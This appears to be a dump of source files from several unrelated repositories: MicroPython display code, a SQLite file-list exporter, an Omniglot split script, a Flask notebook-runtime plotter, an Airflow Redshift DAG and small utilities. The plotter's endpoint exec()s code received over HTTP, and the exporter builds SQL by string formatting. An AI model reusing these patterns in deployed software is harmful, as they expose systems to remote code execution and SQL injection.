await asyncio.sleep(1) asyncio.create_task(display_outputs()) d = dht.DHT22(machine.Pin(14)) asyncio.create_task(report_dht_data(d)) try: asyncio.run(main()) finally: asyncio.new_event_loop() ```
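A hedged sketch of driving the `Scale` widget above with the same nanogui setup that `test_ssd_dht_async.py` uses (display object from `color_setup`, a `Writer` wrapping one of the bundled fonts); the geometry and the chosen font are illustrative assumptions:

```python
from color_setup import ssd
from gui.core.nanogui import refresh
from gui.core.writer import Writer
from gui.widgets.scale import Scale
import gui.fonts.arial10 as arial10

wri = Writer(ssd, arial10, verbose=False)
scale = Scale(wri, 10, 10, width=120)  # row=10, col=10
scale.value(0.25)                      # clamped to [-1.0, 1.0]; redraws the widget
refresh(ssd)                           # push the frame buffer to the display
```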
{ "source": "aabcce/offline_file_sync", "score": 2 }
#### File: offline_file_sync/export_file_list/export_file_list.py ```python import sys import os import stat import time import datetime from os.path import join import re import base64 from oslo_config import cfg from oslo_log import log from util import hashutil import threading import multiprocessing import sqlite3 LOG = log.getLogger(__name__) CONF = cfg.CONF export_file_list_opts = [ cfg.ListOpt('includes', default='', help='Include dirs'), cfg.ListOpt('excludes', default='', help='Exclude dirs'), cfg.StrOpt('export_sqlite_db', default='', help='Dest sqlite db file'), ] CONF.register_opts(export_file_list_opts, group='export_file_list') rLock = threading.RLock() conn = None def getTimestamp(): time_now = datetime.datetime.now().strftime("%Y-%m-%dT%H-%M-%S.%f") return time_now def initSqlite(dbfile): if os.path.isfile(dbfile): os.rename(dbfile, dbfile + "." + getTimestamp()) conn = sqlite3.connect(dbfile) cursor = conn.cursor() # ERROR_STATE # 1 folder is not readable # 2 file is not exist # 3 file is not readable # 4 file is not readable table_create_sql = 'create table file (ID INTEGER PRIMARY KEY AUTOINCREMENT, FOLDER TEXT, FILE TEXT,'\ ' ERROR_STATE INT, CTMP REAL, MTMP REAL, FSIZE INTEGER(8), HASH CHARACTER(32))' cursor.execute(table_create_sql) cursor.close() conn.commit() conn.close() def insert_data(data, conn = None): # logger = multiprocessing.log_to_stderr() dedicade_conn = conn is None if dedicade_conn: dbfile = CONF.export_file_list.export_sqlite_db conn = sqlite3.connect(dbfile) cursor = conn.cursor() # cursor.execute('insert into user (id, name) values (\'1\', \'Michael\')') table_insert_sql = "insert into file (FOLDER, FILE, ERROR_STATE, CTMP, MTMP, FSIZE, HASH)" \ " values ('{FOLDER}', '{FILE}', {ERROR_STATE}, {CTMP}, {MTMP}, {FSIZE}, '{HASH}')" if data.__class__.__name__ == "list": max_comm = 1024 rec = 0 for d in data: # print d sql = table_insert_sql.format(**d) cursor.execute(sql) # logger.info(sql) rec = rec + 1 if rec >= max_comm: conn.commit() rec = 0 if rec > 0: conn.commit() rec = 0 elif data.__class__.__name__ == "dict": sql = table_insert_sql.format(**data) # logger.info(sql) cursor.execute(sql) cursor.close() conn.commit() if dedicade_conn: conn.close() def dirworker(targetFolder): def onError(osError): dirname = osError.filename data = { "FOLDER": base64.encodestring(dirname), "FILE": '', "ERROR_STATE": 1, "CTMP": 0, "MTMP": 0, "FSIZE": 0, "HASH": '', } insert_data(data) def get_exclude_files_regex(): exclude_files = CONF.export_file_list.excludes exclude_files.append(os.path.abspath(CONF.export_file_list.export_sqlite_db)) exclude_files.append(os.path.dirname(os.path.dirname(__file__))) return [re.compile(f) for f in exclude_files] exclude_files_regex = get_exclude_files_regex() def match_excludes(file): # exclude_files_regex = get_exclude_files_regex() for regex in exclude_files_regex: if regex.match(file): return True return False global rLock dbfile = CONF.export_file_list.export_sqlite_db conn = sqlite3.connect(dbfile) for root, dirs, files in os.walk(top=targetFolder, topdown=True, onerror=onError, followlinks=False): print "Current root folder: " + root file_data = [] for file_name in files: full_file_path = join(root, file_name) if match_excludes(full_file_path): continue ctmp = 0 mtmp = 0 fsize = 0 error_state = 0 hash = '' try: file_state = os.stat(full_file_path) ctmp = file_state.st_ctime mtmp = file_state.st_mtime fsize = file_state.st_size except: err = sys.exc_info() LOG.error(str(err)) print(str(err)) error_state = 2 if (file_state.st_mode 
& stat.S_IFREG == stat.S_IFREG) and \ file_state.st_mode & stat.S_IFBLK != stat.S_IFBLK and \ file_state.st_mode & stat.S_IFSOCK != stat.S_IFSOCK and \ file_state.st_mode & stat.S_IFDIR != stat.S_IFDIR and \ file_state.st_mode & stat.S_IFCHR != stat.S_IFCHR and \ file_state.st_mode & stat.S_IFIFO != stat.S_IFIFO and \ os.access(full_file_path, os.R_OK): try: hash = hashutil.md5sum(full_file_path) except: err = sys.exc_info() LOG.error(str(err)) print(str(err)) error_state = 4 else: error_state = 3 data = { "FOLDER": base64.encodestring(root), "FILE": base64.encodestring(file_name), "ERROR_STATE": error_state, "CTMP": ctmp, "MTMP": mtmp, "FSIZE": fsize, "HASH": hash, } file_data.append(data) rLock.acquire() insert_data(file_data, conn) rLock.release() ready_dirs = [] for dir_name in dirs: full_dir_path = join(root, dir_name, os.path.pathsep) if not match_excludes(full_dir_path): ready_dirs.append(dir_name) dirs = ready_dirs conn.close() def run(): time1 = time.time() LOG.info('Started at: ' + getTimestamp()) print('Started at: ' + getTimestamp()) include_dirs = CONF.export_file_list.includes dbfile = CONF.export_file_list.export_sqlite_db initSqlite(dbfile) for targetFolder in include_dirs : p = multiprocessing.Process(target=dirworker, name="dirworker" + "." + getTimestamp(), args=(targetFolder,)) p.start() p.join() # dirworker(targetFolder) time2 = time.time() LOG.info('Ended at: ' + getTimestamp()) print('Ended at: ' + getTimestamp()) LOG.info('Last ' + str(time2 - time1) + ' s') print('Last ' + str(time2 - time1) + ' s') ``` #### File: aabcce/offline_file_sync/harness.py ```python import sys import os import multiprocessing from export_file_list import export_file_list from compare_file_list import compare_file_list from backup_file_list import backup_file_list work_folder = os.path.dirname(os.path.abspath(__file__)) # sys.path.append(work_folder) from oslo_config import cfg from oslo_log import log CONF = cfg.CONF # LOG = log.getLogger(__name__) # log.register_options(CONF) CLI_OPTS = [ cfg.ListOpt('task', default=[], help='Task type'), ] CONF.register_cli_opts(CLI_OPTS) CONF(default_config_files=[work_folder + "/conf/harness.conf"]) # log.setup(CONF, 'harness') LOG = multiprocessing.log_to_stderr() def __help(): print """ Usage: harness --task=export harness --task=compare [Linux Only] harness --task=backup """ if __name__ == "__main__": argv = sys.argv if len(argv) == 0 : print __help() exit() if argv[0].rfind("harness.py") > -1: argv.pop(0) if len(argv) == 0 : print __help() exit() if CONF.task[0] == "export": try: export_file_list.run() except: err = sys.exc_info() LOG.error(str(err)) print(str(err)) elif CONF.task[0] == "compare": if sys.platform == "win32": print "Error: Windows is not well tested." 
exit() try: compare_file_list.run() except: err = sys.exc_info() LOG.error(str(err)) print(str(err)) elif CONF.task[0] == "backup": try: backup_file_list.run() except: err = sys.exc_info() LOG.error(str(err)) print(str(err)) else: print __help() exit() ``` #### File: harness/exportfile/models.py ```python from __future__ import unicode_literals from django.db import models class File(models.Model): class Meta: managed = False db_table = "file" ID = models.AutoField(primary_key=True) FOLDER = models.CharField(max_length=512) FILE = models.CharField(max_length=512) ERROR_STATE = models.IntegerField() CTMP = models.FloatField() MTMP = models.FloatField() FSIZE = models.IntegerField() HASH = models.CharField(max_length=32) def toDict(self): return dict([(attr, getattr(self, attr)) for attr in [f.name for f in self._meta.fields]]) # type(self._meta.fields).__name__ ```
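A sketch of reading back the catalogue that `export_file_list` writes: the columns match the schema created by `initSqlite()`, `FOLDER`/`FILE` are stored base64-encoded by `insert_data()`, and the database path is whatever `export_sqlite_db` was set to in `conf/harness.conf` (assumed here):

```python
import base64
import sqlite3

conn = sqlite3.connect('export.db')  # assumed value of export_sqlite_db
rows = conn.execute(
    "SELECT FOLDER, FILE, FSIZE, HASH FROM file "
    "WHERE ERROR_STATE = 0 AND HASH != '' ORDER BY HASH"
)
for folder, name, size, md5 in rows:
    # FOLDER and FILE were base64-encoded before insertion
    print(base64.b64decode(folder).decode(), base64.b64decode(name).decode(), size, md5)
conn.close()
```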
{ "source": "aabdelkad/prototypical-networks", "score": 3 }
#### File: prototypical-networks/scripts/original_script.py
```python
import os
import argparse
import zipfile


def prepare_txt_file_content(files):
    content = []
    for name in files:
        _, alphabet, character, _ = name.split('/')
        line = os.path.join(alphabet, character, 'rot000') + '\n'
        if line not in content:
            content.append(line)
    return content


parser = argparse.ArgumentParser(description='Create original split')

default_images_base_dir = '.'
parser.add_argument('--images_base_dir', type=str, default=default_images_base_dir,
                    help="location of images zip files (default: {:s})".format(default_images_base_dir))
default_split_txt_dir = 'data/omniglot/splits/original'
parser.add_argument('--split_txt_dir', type=str, default=default_split_txt_dir,
                    help="location of directory to place split txt files (default: {:s})".format(default_split_txt_dir))
parser.add_argument('--validation_size', type=float, default=0.20, help="fraction of images to put in val")

args = vars(parser.parse_args())
validation_size = args['validation_size']

images_background_path = os.path.join(args['images_base_dir'], 'images_background.zip')
images_evaluation_path = os.path.join(args['images_base_dir'], 'images_evaluation.zip')

trainval_path = os.path.join(args['split_txt_dir'], 'trainval.txt')
test_path = os.path.join(args['split_txt_dir'], 'test.txt')
train_path = os.path.join(args['split_txt_dir'], 'train.txt')
val_path = os.path.join(args['split_txt_dir'], 'val.txt')

if not os.path.isdir(args['split_txt_dir']):
    os.mkdir(args['split_txt_dir'])

zip = zipfile.ZipFile(images_background_path)
background_files = list(filter(lambda x: True if '.png' in x else False, list(zip.namelist())))
zip = zipfile.ZipFile(images_evaluation_path)
evaluation_files = list(filter(lambda x: True if '.png' in x else False, list(zip.namelist())))

print("total images number {n}".format(n=len(evaluation_files) + len(background_files)))

############# Trainval ##########################################################
trainval = prepare_txt_file_content(background_files)
print('writing trainval txt, number of trainval images={n}'.format(n=len(trainval)))
with open(trainval_path, 'w') as trainval_file:
    trainval_file.writelines(trainval)

############# Train/Val ##########################################################
split_index = int(validation_size * len(background_files))
train_files = background_files[:-split_index]
val_files = background_files[-split_index:]

train = prepare_txt_file_content(train_files)
print('writing train txt, number of train images={n}'.format(n=len(train)))
with open(train_path, 'w') as train_file:
    train_file.writelines(train)

val = prepare_txt_file_content(val_files)
print('writing val txt, number of val images={n}'.format(n=len(val)))
with open(val_path, 'w') as val_file:
    val_file.writelines(val)

############# Test ##########################################################
test = prepare_txt_file_content(evaluation_files)
print('writing test txt, number of test images={n}'.format(n=len(test)))
with open(test_path, 'w') as test_file:
    test_file.writelines(test)
```
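A tiny illustration of what `prepare_txt_file_content()` above emits — the zip entry names are made up, and the call assumes the function is in scope (e.g. pasted into a REPL):

```python
names = [
    'images_background/Latin/character01/0601_01.png',
    'images_background/Latin/character01/0601_02.png',
    'images_background/Latin/character02/0602_01.png',
]
print(prepare_txt_file_content(names))
# ['Latin/character01/rot000\n', 'Latin/character02/rot000\n']
```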
{ "source": "aabdinur2021/W200-Project1", "score": 3 }
#### File: runtime_plotter_src/src/hist_plotter.py ```python import numpy as np import pandas as pd from bokeh.io import show, curdoc from bokeh.models import NumeralTickFormatter, HoverTool, ColumnDataSource from bokeh.plotting import figure class HistogramPlotter: """ Plots a histogram using bokeh """ def __init__(self, execution_times, colors=['#4682B4', '#D2B48C']): """ Initialize plotter with the execution times of a notebook :param execution_times: How long each notebook code cell took :param colors: Colors in hexadecimal - Ascii colors don't work when running from command line """ self.execution_times = execution_times self.colors = colors def plot(self, show_plot=True): """ Plot a histogram using the data provided for the plotter :param show_plot: whether to display the plot or not :return: None """ # Get all the execution times. data = list(self.execution_times.values()) # Create dynamic bins based on the data. bins = np.arange(np.floor(min(data)), np.ceil(max(data))) # Create histogram using numpy hist, edges = np.histogram(data, weights=np.ones(len(data)) / len(data), density=1, bins=bins) # Create pandas from numpy histogram. This is used for hoverTool arr_df = pd.DataFrame({'count': hist, 'left': edges[:-1], 'right': edges[1:]}) arr_df['f_count'] = [count for count in arr_df['count']] arr_df['f_interval'] = ['%d to %d ' % (left, right) for left, right in zip(arr_df['left'], arr_df['right'])] # User a dark theme for the histogram curdoc().theme = 'dark_minimal' arr_src = ColumnDataSource(arr_df) # Use Bokeh to plot the histogram using the numpy data provided p = figure(title="Histogram of {}".format("How Fast is my code?"), x_axis_label="Runtime (ms)", y_axis_label="Distribution (%)", sizing_mode='stretch_both', tools='pan') p.quad(top='count', source=arr_src, bottom=0, left='left', right='right', line_color=self.colors[0], fill_color=self.colors[1], fill_alpha=0.7) # Create a HoverTool to show the runtime and distribution hover = HoverTool(tooltips=[('Runtime (ms)', '@f_interval'), ('Distribution (%)', '@f_count{%0.2f}')]) # Format the y axis with % and add hoverPlot p.yaxis.formatter = NumeralTickFormatter(format='0 %') p.add_tools(hover) # show plot if true if show_plot: show(p) ``` #### File: runtime_plotter_src/src/main.py ```python import getopt import sys from flask import Flask from flask_cors import CORS from nb_processor_controller import nb_controller_blue_print app = Flask(__name__) CORS(app) def main(argv): opts, args = getopt.getopt(argv, "hp:") host = 'localhost' port = 8000 for opt in opts: if opt[0] == '-h': print("python main.py -p <port>") exit(0) elif opt[0] == '-p': port = opt[1] app.register_blueprint(nb_controller_blue_print) app.run(host, port) if __name__ == "__main__": main(sys.argv[1:]) ``` #### File: runtime_plotter_src/src/nb_executor.py ```python import datetime from invalid_nb_error import InvalidNotebookError import logging class NotebookExecutor: def __init__(self, notebook_data): self.notebook_data = notebook_data self.execution_times = {} def execute(self): """ Execute all code cells in the notebook :return: """ # Store the execution times of all cells self.execution_times = {} for i in range(len(self.notebook_data)): notebook_element = self.notebook_data[i] # Only process code cells if notebook_element['cell_type'] == 'code': try: start_time = datetime.datetime.now() # provide globals to exec so as to use the global context for processing the request exec(notebook_element['source'], None, globals()) execution_time = datetime.datetime.now() - 
start_time # Calculate the execution time self.execution_times[i] = round(execution_time.total_seconds() * 1000) except Exception: # If any exception is encountered, log the exception and process the other requests logging.error("Code can't be executed: " + notebook_element['source']) # If no code was executed, throw an invalid request if len(self.execution_times) < 1: logging.error("No Executable Code Found") raise InvalidNotebookError(len(self.execution_times)) return self.execution_times ``` #### File: runtime_plotter_src/src/nb_processor_controller.py ```python import logging from flask import request, abort, Blueprint from nb_processor_service import NBService from invalid_nb_error import InvalidNotebookError from no_content_nb_error import NoContentNotebookError nb_controller_blue_print = Blueprint("nb_processor_controller", __name__) @nb_controller_blue_print.route('/notebook_data', methods=['POST']) def notebook_data(): """ Exposes a single Flask endpoint which gets all the notebook elements to process - In case notebook contains no data or no code cells, throw a 400 bad request :return: None """ # POST request notebook_elements = request.get_json() logging.info('The current request received is: ', notebook_elements) try: logging.info("Starting Processing Notebook Data") # Create a Service with the notebook elements and received from the request nb_svc = NBService(notebook_elements) # Process all the notebook elements nb_svc.process() logging.info("Completed Processing Notebook Data") except (InvalidNotebookError, NoContentNotebookError) as e: # In case notebook contains no elements or no code cells, throw a 400 bad request logging.error(e) abort(400) return 'OK', 200 ``` #### File: aabdinur2021/W200-Project1/setup.py ```python import getopt import sys import os from distutils.dir_util import copy_tree WINDOWS_PATH = "C:\\Users\\user_name\\AppData\Roaming\\jupyter\\nbextensions" LINUX_PATH = "/usr/local/share/jupyter/nbextensions/" def setup(argv): opts, args = getopt.getopt(argv, "o:u:") oper_sys = 'linux' user_name = '' extension_name = 'runtime_plotter' for opt in opts: print(opt) if opt[0] == '-o': oper_sys = opt[1] elif opt[0] == '-u': user_name = opt[1] if 'win' in oper_sys.lower(): win_path = WINDOWS_PATH.replace("user_name", user_name) path = win_path + "\\" + extension_name os.mkdir(path) copy_tree("runtime_plotter_extension", path) else: path = LINUX_PATH + extension_name os.mkdir(path) copy_tree("runtime_plotter_extension/", path) if __name__ == "__main__": setup(sys.argv[1:]) ```
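A client-side sketch of exercising the `/notebook_data` endpoint above: host and port follow `main.py`'s defaults, and the payload shape (a list of cells with `cell_type`/`source`) follows what `NotebookExecutor` expects; the cell contents are made up:

```python
import requests

cells = [
    {'cell_type': 'markdown', 'source': '# not executed'},
    {'cell_type': 'code', 'source': 'total = sum(range(10**6))'},
]
resp = requests.post('http://localhost:8000/notebook_data', json=cells)
print(resp.status_code)  # 200 on success, 400 when no executable code is found
```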
{ "source": "AAbdoli/deepLearning", "score": 3 }
#### File: AAbdoli/deepLearning/residual.py ```python import numpy as np from keras import layers from keras.layers import Input, Add, Dense, Activation, ZeroPadding2D, BatchNormalization, Flatten, Conv2D, AveragePooling2D, MaxPooling2D, GlobalMaxPooling2D from keras.models import Model, load_model from keras.preprocessing import image from keras.utils import layer_utils from keras.utils.data_utils import get_file from keras.applications.imagenet_utils import preprocess_input import pydot from IPython.display import SVG from keras.utils.vis_utils import model_to_dot from keras.utils import plot_model from resnets_utils import * from keras.initializers import glorot_uniform import scipy.misc from matplotlib.pyplot import imshow %matplotlib inline import keras.backend as K K.set_image_data_format('channels_last') K.set_learning_phase(1) def identity_block(X, f, filters, stage, block): conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' F1, F2, F3 = filters X_shortcut = X X = Conv2D(filters = F1, kernel_size = (1, 1), strides = (1,1), padding = 'valid', name = conv_name_base + '2a', kernel_initializer = glorot_uniform(seed=0))(X) X = BatchNormalization(axis = 3, name = bn_name_base + '2a')(X) X = Activation('relu')(X) X = Conv2D(filters = F2, kernel_size = (f, f), strides = (1,1), padding = 'same', name = conv_name_base + '2b', kernel_initializer = glorot_uniform(seed=0))(X) X = BatchNormalization(axis = 3, name = bn_name_base + '2b')(X) X = Activation('relu')(X) X = Conv2D(filters = F3, kernel_size = (1 , 1), strides = (1,1), padding = 'valid', name = conv_name_base + '2c', kernel_initializer = glorot_uniform(seed=0))(X) X = BatchNormalization(axis = 3, name = bn_name_base + '2c')(X) X = layers.Add()([X,X_shortcut]) X = Activation('relu')(X) return X tf.reset_default_graph() with tf.Session() as test: np.random.seed(1) A_prev = tf.placeholder("float", [3, 4, 4, 6]) X = np.random.randn(3, 4, 4, 6) A = identity_block(A_prev, f = 2, filters = [2, 4, 6], stage = 1, block = 'a') test.run(tf.global_variables_initializer()) out = test.run([A], feed_dict={A_prev: X, K.learning_phase(): 0}) def convolutional_block(X, f, filters, stage, block, s = 2): conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' F1, F2, F3 = filters X_shortcut = X X = Conv2D(F1, (1, 1), strides = (s,s),padding = 'valid', name = conv_name_base + '2a', kernel_initializer = glorot_uniform(seed=0))(X) X = BatchNormalization(axis = 3, name = bn_name_base + '2a')(X) X = Activation('relu')(X) X = Conv2D(F2, (f, f), strides = (1,1),padding = 'same', name = conv_name_base + '2b', kernel_initializer = glorot_uniform(seed=0))(X) X = BatchNormalization(axis = 3, name = bn_name_base + '2b')(X) X = Activation('relu')(X) X = Conv2D(F3, (1, 1), strides = (1,1),padding = 'valid', name = conv_name_base + '2c', kernel_initializer = glorot_uniform(seed=0))(X) X = BatchNormalization(axis = 3, name = bn_name_base + '2c')(X) X_shortcut = Conv2D(F3, (1, 1), strides = (s,s),padding = 'valid', name = conv_name_base + '1', kernel_initializer = glorot_uniform(seed=0))(X_shortcut) X_shortcut = BatchNormalization(axis = 3, name = bn_name_base + '1')(X_shortcut) X = layers.Add()([X,X_shortcut]) X = Activation('relu')(X) return X tf.reset_default_graph() with tf.Session() as test: np.random.seed(1) A_prev = tf.placeholder("float", [3, 4, 4, 6]) X = np.random.randn(3, 4, 4, 6) A = convolutional_block(A_prev, f = 2, filters = [2, 4, 6], stage = 1, 
block = 'a') test.run(tf.global_variables_initializer()) out = test.run([A], feed_dict={A_prev: X, K.learning_phase(): 0}) def ResNet50(input_shape = (64, 64, 3), classes = 6): X_input = Input(input_shape) X = ZeroPadding2D((3, 3))(X_input) X = Conv2D(64, (7, 7), strides = (2, 2), name = 'conv1', kernel_initializer = glorot_uniform(seed=0))(X) X = BatchNormalization(axis = 3, name = 'bn_conv1')(X) X = Activation('relu')(X) X = MaxPooling2D((3, 3), strides=(2, 2))(X) X = convolutional_block(X, f = 3, filters = [64, 64, 256], stage = 2, block='a', s = 1) X = identity_block(X, 3, [64, 64, 256], stage=2, block='b') X = identity_block(X, 3, [64, 64, 256], stage=2, block='c') X = convolutional_block(X, f = 3, filters = [128, 128, 512], stage = 3, block='a', s = 2) X = identity_block(X, 3, [128, 128, 512], stage=3, block='b') X = identity_block(X, 3, [128, 128, 512], stage=3, block='c') X = identity_block(X, 3, [128, 128, 512], stage=3, block='d') X = convolutional_block(X, f = 3, filters = [256, 256, 1024], stage = 4, block='a', s = 2) X = identity_block(X, 3, [256, 256, 1024], stage=4, block='b') X = identity_block(X, 3, [256, 256, 1024], stage=4, block='c') X = identity_block(X, 3, [256, 256, 1024], stage=4, block='d') X = identity_block(X, 3, [256, 256, 1024], stage=4, block='e') X = identity_block(X, 3, [256, 256, 1024], stage=4, block='f') X = convolutional_block(X, f = 3, filters = [512, 512, 2048], stage = 5, block='a', s = 2) X = identity_block(X, 3, [512, 512, 2048], stage=5, block='b') X = identity_block(X, 3, [512, 512, 2048], stage=5, block='c') X = AveragePooling2D(pool_size=(2, 2), strides=None, padding='valid', name='avg_pool')(X) X = Flatten()(X) X = Dense(classes, activation='softmax', name='fc' + str(classes), kernel_initializer = glorot_uniform(seed=0))(X) model = Model(inputs = X_input, outputs = X, name='ResNet50') return model model = ResNet50(input_shape = (64, 64, 3), classes = 6) model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy']) X_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_dataset() X_train = X_train_orig/255. X_test = X_test_orig/255. Y_train = convert_to_one_hot(Y_train_orig, 6).T Y_test = convert_to_one_hot(Y_test_orig, 6).T model.fit(X_train, Y_train, epochs = 2, batch_size = 32) preds = model.evaluate(X_test, Y_test) print ("Loss = " + str(preds[0])) print ("Test Accuracy = " + str(preds[1])) model = load_model('ResNet50.h5') preds = model.evaluate(X_test, Y_test) print ("Loss = " + str(preds[0])) print ("Test Accuracy = " + str(preds[1])) ```
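Note that the graph-mode test snippets in `residual.py` call `tf.reset_default_graph()` and `tf.Session` even though `tensorflow` does not appear in the import block shown above; under TensorFlow 1.x they presuppose roughly the following (a sketch, not part of the original file):

```python
import tensorflow as tf

tf.reset_default_graph()
with tf.Session() as sess:
    A_prev = tf.placeholder("float", [3, 4, 4, 6])  # same placeholder shape as the tests above
    sess.run(tf.global_variables_initializer())
```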
{ "source": "AAbdul12/Data-engineering-nanodegree", "score": 3 }
#### File: exercises/dags/1_ex6_redshift_queries.py ```python import datetime import logging from airflow import DAG from airflow.contrib.hooks.aws_hook import AwsHook from airflow.hooks.postgres_hook import PostgresHook from airflow.operators.postgres_operator import PostgresOperator from airflow.operators.python_operator import PythonOperator import sql_statements def load_data_to_redshift(*args, **kwargs): aws_hook = AwsHook("aws_credentials") credentials = aws_hook.get_credentials() redshift_hook = PostgresHook("redshift") redshift_hook.run(sql_statements.COPY_ALL_TRIPS_SQL.format(credentials.access_key, credentials.secret_key)) dag = DAG( 'lesson1.solution6', start_date=datetime.datetime.now() ) create_table = PostgresOperator( task_id="create_table", dag=dag, postgres_conn_id="redshift", sql=sql_statements.CREATE_TRIPS_TABLE_SQL ) copy_task = PythonOperator( task_id='load_from_s3_to_redshift', dag=dag, python_callable=load_data_to_redshift ) location_traffic_task = PostgresOperator( task_id="calculate_location_traffic", dag=dag, postgres_conn_id="redshift", sql=sql_statements.LOCATION_TRAFFIC_SQL ) create_table >> copy_task copy_task >> location_traffic_task ```
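The DAG above pulls its SQL out of a `sql_statements` module that is not included here. The stand-in below is purely hypothetical (the table name, columns and S3 path are invented), but it shows the shape the three constants need for `create_table`, `load_data_to_redshift` (which fills the two `{}` placeholders with the access key and secret key, in that order) and `calculate_location_traffic` to run.

```python
# Hypothetical stand-in for sql_statements.py; table name, columns and S3 path are invented.
CREATE_TRIPS_TABLE_SQL = """
CREATE TABLE IF NOT EXISTS trips (
    trip_id    INTEGER NOT NULL,
    start_time TIMESTAMP,
    bikeid     INTEGER
);
"""

# The DAG calls .format(access_key, secret_key), so the two {} placeholders
# must appear in exactly that order.
COPY_ALL_TRIPS_SQL = """
COPY trips
FROM 's3://some-example-bucket/trips.csv'
ACCESS_KEY_ID '{}'
SECRET_ACCESS_KEY '{}'
IGNOREHEADER 1
CSV;
"""

LOCATION_TRAFFIC_SQL = """
CREATE TABLE IF NOT EXISTS station_traffic AS
SELECT bikeid, COUNT(*) AS num_trips
FROM trips
GROUP BY bikeid;
"""
```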
{ "source": "aabdullah-bos/yaci", "score": 2 }
#### File: yaci/examples/cool_api.py ```python def get(*args): print("In cool_api with args {}".format(args)) return args ``` #### File: yaci/tests/test_cache_storage.py ```python from __future__ import absolute_import from __future__ import print_function from __future__ import division from __future__ import unicode_literals import mock from yaci import cache_manager class TestCacheManager(object): def setup(self): self.test_storage = {'foo': 'bar', 'baz': 'boo'} self.mock_storage = mock.MagicMock() self.mock_storage.get.side_effect = self.getitem self.mock_storage.store.side_effect = self.setitem self.mock_storage.cached.side_effect = lambda x: x in self.test_storage self.cache_manager = cache_manager.CacheManager(self.mock_storage) def getitem(self, key): return self.test_storage[key] def setitem(self, key, value): self.test_storage[key] = value def teardown(self): pass def test_init(self): cm = self.cache_manager msg = "Unexpected value for storage." assert cm.storage == self.mock_storage, msg def test_get(self): cm = self.cache_manager for key, value in self.test_storage.items(): expected = self.test_storage[key] actual = cm[key] msg = "Expected {0} got {1}, for key {2}".format(expected, actual, key) assert expected == actual, msg def test_store(self): cm = self.cache_manager key = 'boob' value = 'food' cm[key] = value actual = cm[key] msg = "Expected {0} got {1}, for key {2}".format(value, actual, key) assert value == actual, msg def test_default_get(self): cm = self.cache_manager key = 'braut' value = 'vurst' def do_something(x): return x actual = cm.default_get(key, do_something, value) msg = "Expected {0} got {1}, for key {2}".format(value, actual, key) assert value == actual, msg ```
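The tests above only ever talk to `CacheManager` through a `MagicMock`. For a concrete feel of the same interface, here is a hedged usage sketch with a tiny dict-backed storage class; `DictStorage` is invented for illustration and simply mirrors the `get`/`store`/`cached` methods the mock stubs out.

```python
from yaci import cache_manager

class DictStorage(object):
    """Minimal in-memory storage exposing the interface the tests mock out."""

    def __init__(self):
        self._data = {}

    def get(self, key):
        return self._data[key]

    def store(self, key, value):
        self._data[key] = value

    def cached(self, key):
        return key in self._data

manager = cache_manager.CacheManager(DictStorage())
manager['answer'] = 42      # routed through DictStorage.store
print(manager['answer'])    # 42, read back through DictStorage.get
```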
{ "source": "aabdulwahed/cloudpots", "score": 3 }
#### File: agent/client/config.py ```python import os from ConfigParser import ConfigParser from configobj import ConfigObj _config_file = 'resource.conf' class Configuration(): def __init__(self): self._config = ConfigParser() def load_config(self, filename): if os.path.exists(filename): self._config.read(filename) return self._config._sections else: return None def reset_config(self, filename, configurations): config = ConfigObj() for k,v in configurations.iteritems(): print k,v if os.path.exists(filename): config.filename = filename config['RESOURCES'] = {} config['RESOURCES']['cpu'] = configurations['RESOURCES']['cpu'] config['RESOURCES']['mem'] = configurations['RESOURCES']['mem'] config['RESOURCES']['ports'] = configurations['RESOURCES']['ports'] config.write() return True else: return False ``` #### File: agent/client/request.py ```python import os, sys import urllib2 import traceback import httplib import simplejson as json class Request(): def send_request(self,request): try: return urllib2.urlopen(request).read() except urllib2.HTTPError, e: return json.dumps({'ERROR': 'HTTPError = ' + str(e.code)}) except urllib2.URLError, e: return json.dumps({'ERROR': 'URLError = ' + str(e.reason)}) except httplib.HTTPException, e: return json.dumps({'ERROR': 'HTTPException'}) except Exception: return json.dumps({'ERROR': 'generic exception: ' + traceback.format_exc()}) ```
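`Configuration.load_config` reads an INI-style `resource.conf` and hands back the raw section dict, while `reset_config` writes a `RESOURCES` section with `cpu`, `mem` and `ports` keys. The round-trip below is a sketch only: the values are made up, and it assumes the class is importable as `config.Configuration`.

```python
from config import Configuration  # assumes agent/client is on sys.path

# Illustrative resource.conf contents; the numbers mean nothing in particular.
sample_conf = """[RESOURCES]
cpu = 4
mem = 2048
ports = 8000-8100
"""

with open('resource.conf', 'w') as fh:
    fh.write(sample_conf)

cfg = Configuration()
sections = cfg.load_config('resource.conf')
print(sections['RESOURCES']['cpu'])  # '4' (ConfigParser hands back strings)
```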
{ "source": "aabdulwahed/wms", "score": 2 }
#### File: app/api/views.py ```python from app.models import * from app.fiware import fiware from wms import settings from rest_framework.views import APIView from rest_framework.renderers import JSONRenderer from rest_framework.response import Response class UpdateStatus(APIView): renderer_classes = (JSONRenderer,) def get(self,request, format=None): try: apikey = request.GET.get('apikey') device_id = request.GET.get('devid') type = request.GET.get('type') workspace = WorkSpace.objects.get(ws_id=device_id) service = Service.objects.get(apikey=apikey) fiware_obj = fiware.Fiware(settings.service_api, settings.workspace_api, settings.cbroker) fiware_obj.updateWorkspaceData(service.name, workspace.entity_name, apikey, device_id, type) except: return Response({'status':False}) return Response({'status': True}) ``` #### File: app/fiware/fiware.py ```python from request import Request from wms import settings import random, string import json class Fiware(): def __init__(self, serviceapi, workspaceapi, cbroker): self.requester = Request(serviceapi, workspaceapi, cbroker) def registerService(self, name): try: apikey = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(20)) entity_type = settings.entity_type resource = settings.resouce cbroker = settings.cbroker header = {"Content-type": "application/json", "Fiware-Service": name, "Fiware-ServicePath": "/"} data = '{"services":[{"apikey":"%s","cbroker":"%s","entity_type":"%s","resource":"%s"}]}'%(apikey, cbroker, entity_type, resource) #raise Exception(data) self.requester.sendPostRequest(header, data, settings.service_api) return {"apikey":apikey, "entity_type": entity_type, "cbroker": cbroker, "resource": resource, "name":name} except: return False def registerWorkspace(self, apikey, service, workspace, entity, device_id, protocol, timezone, maxsize, address, long, lat): try: header = {"Content-type": "application/json", "Fiware-Service": service, "Fiware-ServicePath": "/"} data = '{"devices": [{"device_id": "%s","entity_name": "%s","entity_type": "%s","protocol": "%s","timezone": "%s","attributes": [{"object_id": "n","name": "name","type": "string"},{"object_id": 